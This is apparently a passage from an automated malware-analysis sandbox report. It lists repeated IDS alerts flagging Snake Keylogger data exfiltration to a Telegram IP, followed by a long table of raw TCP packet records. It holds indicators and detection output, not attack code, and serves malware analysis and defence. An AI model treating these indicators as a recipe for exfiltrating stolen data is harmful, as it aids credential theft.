                                                                                                        2024-12-18T16:32:12.262918+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849872149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:13.086608+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849873149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:13.746832+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849878149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:14.189950+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849879149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:15.063620+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849881149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:15.662738+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849882149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:16.140324+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849887149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:16.999349+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849889149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:17.610863+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849890149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:18.148964+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849895149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:19.097134+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849897149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:19.792327+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849898149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:20.211914+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849900149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:21.039962+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849905149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:21.724028+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849906149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:22.213226+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849908149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:23.000800+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849913149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:23.920372+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849914149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:24.526429+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849915149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:25.067294+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849920149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:25.893931+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849922149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:26.538935+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849924149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:26.984961+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849927149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:27.815307+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849930149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:28.583007+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849931149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:28.906098+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849934149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:30.317157+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849938149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:30.546193+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849939149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:30.916664+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849940149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:32.392213+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849946149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:32.530469+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849947149.154.167.220443TCP
                                                                                                        2024-12-18T16:32:36.869744+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.849948149.154.167.220443TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 16:30:30.859276056 CET49704443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:30.859344006 CET44349704185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:30.859425068 CET49704443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:30.865257025 CET49704443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:30.865318060 CET44349704185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:30.865394115 CET49704443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:30.947101116 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:30.947149992 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:30.947242022 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:31.075685978 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:31.075721979 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:32.480650902 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:32.480751991 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:32.485064983 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:32.485070944 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:32.485383987 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:32.530158997 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:32.536323071 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:32.579339981 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.171001911 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.171035051 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.171093941 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.171179056 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:33.171221972 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:33.173142910 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:33.173163891 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.173177958 CET49705443192.168.2.8185.166.143.48
                                                                                                        Dec 18, 2024 16:30:33.173183918 CET44349705185.166.143.48192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.494652033 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:33.494700909 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.494796038 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:33.495277882 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:33.495290041 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.912269115 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.912379980 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.915798903 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.915808916 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.916062117 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.918330908 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.963324070 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.402211905 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451657057 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451689005 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451766014 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.451798916 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451847076 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.459852934 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.459948063 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.629554033 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629581928 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629802942 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.629832029 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629909039 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.637185097 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.676831007 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.676879883 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.677035093 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.677035093 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.677054882 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.686758041 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.686836004 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.686855078 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.741120100 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.789235115 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.789253950 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.789324045 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.789344072 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820683002 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820707083 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820765972 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820841074 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.820862055 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820895910 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847138882 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847250938 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847273111 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847286940 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847326040 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847330093 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847347975 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847379923 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847421885 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847470999 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873508930 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873565912 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873636961 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873657942 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873698950 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873727083 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873730898 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.917141914 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.992357016 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992372036 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992424011 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992465973 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.992484093 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992531061 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.994692087 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010811090 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010828018 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010886908 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.010895014 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010941982 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.031939983 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032022953 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032068968 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.032077074 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032141924 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.050266981 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050282001 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050337076 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050358057 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.050365925 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050390959 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.067245007 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.067265034 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.067341089 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.067349911 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085577011 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085669994 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.085678101 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085762978 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.088179111 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.088231087 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.178302050 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.178323984 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.178455114 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.178478003 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.178533077 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.180318117 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.192980051 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.192994118 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.193062067 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.193070889 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.193114996 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.205964088 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.206037045 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.206067085 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.206094027 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.206120014 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.219908953 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.219939947 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.219980955 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.219988108 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.220021963 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.220048904 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.230865002 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.230892897 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.230973959 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.230981112 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.231007099 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.231035948 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.232362032 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.243402958 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.243424892 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.243498087 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.243505001 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.243540049 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.255342960 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.255431890 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.255438089 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.255508900 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.256968021 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.257021904 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.365597963 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.365626097 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.365667105 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.365675926 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.365705967 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.365721941 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.374454975 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.374476910 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.374525070 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.374541044 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.374547005 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.374584913 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.374598980 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.383017063 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.383032084 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.383064985 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.383161068 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.383167982 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.390932083 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.390950918 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.391009092 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.391027927 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.391041994 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.399563074 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.399656057 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.399658918 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.399682999 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.399709940 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.399738073 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.407589912 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.407605886 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.407664061 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.407674074 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.407691002 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.407710075 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.416121006 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.416145086 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.416220903 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.416230917 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.416264057 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.423752069 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.423768044 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.423865080 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.423890114 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.474133968 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.474169016 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.522140980 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.560720921 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.560740948 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.560822964 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.560847044 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.560847998 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.560882092 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.560906887 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.568290949 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.568372965 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.568429947 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.568442106 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.568490982 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.568492889 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.568530083 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.575570107 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.575628042 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.575687885 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.575697899 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.575725079 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.583158016 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.583276033 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.583292007 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.583364964 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.583971024 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.584032059 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.590770960 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.590790033 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.590873957 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.590883017 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.590933084 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.591749907 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.598145962 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.598165035 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.598238945 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.598248959 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.605572939 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.605668068 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.605685949 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.605782032 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.606486082 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.606553078 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.748475075 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.748503923 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.748545885 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.748562098 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.748586893 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.748614073 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.749310017 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.756725073 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.756750107 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.756869078 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.756879091 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.756911993 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.764183044 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.764202118 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.764252901 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.764261961 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.764282942 CET49706443192.168.2.854.231.224.185
